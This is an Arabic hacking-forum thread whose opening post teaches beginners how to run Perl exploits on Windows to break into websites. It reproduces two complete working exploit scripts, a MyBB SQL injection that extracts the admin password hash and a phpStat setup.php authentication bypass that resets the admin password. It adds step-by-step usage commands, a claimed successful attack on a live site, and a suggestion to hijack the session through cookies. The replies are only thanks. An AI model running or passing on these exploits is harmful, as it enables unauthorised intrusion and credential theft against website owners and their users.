|
| |||||||
 |  | |
 |  |  |
 |
| | أدوات الموضوع | طريقة عرض الموضوع |
02-09-2006, 05:52 AM
| |||
| |||
| إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي بسم الله الرحمن الرحيم موضعنا اليوم مهم جدا جدا جدا وهو كيفية استثمار الثغرات وترجمتها من لغة البيرل وتطبيقها علي الموقع ومن ثم اختراقة الحقيقه كنت من زمان ودي انزل شرحها لان اغلب المنتديات العربيه نزلتها وغير كذا اكثر الاكسبلويتات الان كلها بيرل ونزلت اكسبلويتات كثيره لثغرات سيق شرحها هنا بالمنتدى سووف اضع المهم منها والي تم تطبيقه بنجاح سووف اقوم بتطبيق لثغرتين مختلفه وباقي الاكسبلويتات سوف اضعها بالمرفقات ====== الحين نبدأ !! اول شيء الاداوات المستخدمة لترجمة ثغرات البيرل وهي برنامج اكتف بيرل وكيفية تطبيق الاكسبلويت المعمول بلغة البيرل برنامج activeperl وصلة تحميلة Active perl وبعد التحميل قم بالتنصيب مثل تنصيب أي برنامج        الأن قم بإنشاء مجلد خاص فيك في الدرايفر c وسمه مثلا tryag الان نوقف هنا ونشووف لنا اكسبلويت طيب مثلا انا بطبق ثغرة MyBB Is Down وسبق طرحها بالمنتدى والكاتبDevil-00 طرح اكسبلويت بلغة البيرل لها نشووف الاكسبلويت كود: #!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
}
my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];
if($ARGV[3] eq 0){
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,ui d,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="search\.php\?action=results&sid=(.*?)&sortby=&order=">/ && print "[+] Search ID To Use : $1\n";
exit;
}else{
print "[*] Trying $host\n";
$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
$page =~ m/<a href="member\.php\?action=profile&\;uid=1">(.*?)<\/a>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="forumdisplay\.php\?fid=1">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
وضع الاكسبلويت في المجلد tryag الي سويناه بالدرايفرc انظر الصوره  طيب الحين كيف نعرف انها بلغة البيرل من التاالي /usr/bin/perlهذابيكون في اول الثغرة معاناها انها بلغة البيرل مشان المبتدئين يعرفوا احنا شغاليين كيف الحين نبدأ نذكر اهم الاسس لترجمة اي ثغرة اول شيء النظر للغة الثغرة اذا كانت بلغة السي او بلابيرل او البايثون او غيرة ثانيا النظر للمتغيرات او use مع التركيز فيها وتطبيقها بدقة واسم المتغيرات يختلف من اكسبلويت لاكسبلويت اخر وغالبا ماتكون تحت مسما Examples وراح نشووف الفرق بالاكسبلويت الثاني الي راح نطبقه الفرق كود: use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#################[ MyBB SQL-Injection ]############################\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "################################################## #################\n";
exit;
كود: perl mybb.pl www.vetim.com mybb 0 0 بعد مانطبق الامر هذا وسوف ياتي لنا برقم البحث اليحتوي على بيانات الادمن .. وسوف نكتب الامر التالي لجلبها كود: perl mybb.pl www.vetim.com mybb searchid 1  طبعا الصووره واضحه طبقت فيها الامرين لو تلاحظون الامر الاول لما طبقته اعطاني ملعومات الادمن انه يحمل الرقم 5 وطبقت الامر الثاني لماحطيت الرقم الي حصلة عليه وطلع لي الباسوورد المشفر رووح اخدعه بالكوكيز  ============ الان نطبق ثغرة PHPStat Setup مثل ماقلنا اول ننظر للمتغيرات او use كود: #!/usr/bin/perl
################################################## ###################
#T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
################################################## ###################
# EXPLOIT FOR - PHPStat Setup.PHP Authentication Bypass Vulnerability
#
#Exploit By : A l p h a _ P r o g r a m m e r ( Sirus-v )
#E-Mail : Alpha_Programmer@Yahoo.com
#
#This Xpl Change Admin's Pass in This Portal !!
#Discovered by: SoulBlack
#
#Vulnerable Version : phpStat 1.5
#
################################################## ###################
# Gr33tz To ==> mh_p0rtal , Oil_karchack , Str0ke & AlphaST.Com
#
# So Iranian Hacking & Security Teams :
#
# Crouz , Shabgard , Simorgh-ev ,IHS , Emperor & GrayHatz.NeT
################################################## ###################
use IO::Socket;
if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl http://www.site.com/ /phpstat/ 12345\n";
exit();
}
my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );
unless ($remote) { die "C4nn0t C0nn3ct to $host" }
print "C0nn3cted\n";
$http = "GET $ARGV[1]setup.php?check=yes&username=admin&password=$ARGV[2] HTTP/1.0\n";
$http .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)\n";
$http .= "Host: $host\n\n\n\n";
print "[+]Sending H3ll Packet ...\n";
print $remote $http;
sleep(1);
print "[+]Wait For Authentication Bypass ...\n";
sleep(100);
while (<$remote>)
{
}
print "[+]OK ! Now Goto $host$ARGV[1]setup.php And L0gin Whith:\n\n";
print "[+]User: admin\n";
print "[+]Pass: $ARGV[2]";
#
كود: use IO::Socket;
if (@ARGV < 3)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer --\n\n";
print " Trap-Set UnderGrounD Hacking Team \n\n";
print " Usage: <T4rg3t> <DIR> <Password>\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " phpStat.pl http://www.site.com/ /phpstat/ 12345\n";
exit();
}
phpStat.pl http://www.site.com/ /phpstat/ 12345\n حيث ان phpStat.pl اسم الكسبلويت وتقدر تغيره لاي اسم مو شرط الي كتبته انا وhttp://www.site.com الموقع المستهدف الحين رووح لدوس وطبق الاوامر واذا قالك OK ! Now Goto راح يعطي المسار رووح انسخ المسار وعلى فكره بيعطيك اليوزر والباس مو مشفر يعني اخترق وانت تضحك وهذا تطبيقي على موقع  واي سوال انا جاهز بالمرفقات راح تجدون اكسبلويتات مختلفه لبعض الثغرات الي نزل لها اكسبلويت بلغة البيرل عذابي غير=zmani
_________________  |
|
02-09-2006, 02:07 PM
| ||||
| ||||
| يسلمووووووووووووووو على الشرح المميز اجو التثبيت
_________________  عزيزي العضو نرجو منك التبليغ عن أي مشاركة مخالفه بالضغط على هذه الصورة  وتجنب المخالفات  لتتجنب إيقاف عضويتك
|
|
02-10-2006, 12:32 PM
| |||
| |||
| مشكور على البرنامج والشرح المميز اخوكم\\وطواط
_________________ وطواط گـرهـتٍ المدرســہ وآلتدريــس ولأ عـآد لـے بالهكـرٍ خ ـآطرٍ  |
|
09-01-2009, 02:56 AM
| ||||
| ||||
| رد: إكسبلويتات البيرل وكيفية تطبيقها على الويندوز وترجمة ثغراتها مع تطبيق عملي مشكوووووووووووووووووووووووووووور
_________________ سبحان الله وبحمده سبحان الله العظيم |
|
| مواقع النشر (المفضلة) |
| أدوات الموضوع | |
| طريقة عرض الموضوع | |
| |
المواضيع المتشابهه | ||||
| الموضوع | كاتب الموضوع | المنتدى | مشاركات | آخر رد |
| مرجع وكل ما يتعلق بــWINDOWS XP | أسير الندم | الكمبيوتر و الانترنت الحاسب و الاجهزة computer hardware | 6 | 12-17-2007 08:36 AM |
-
-
العرض العادي
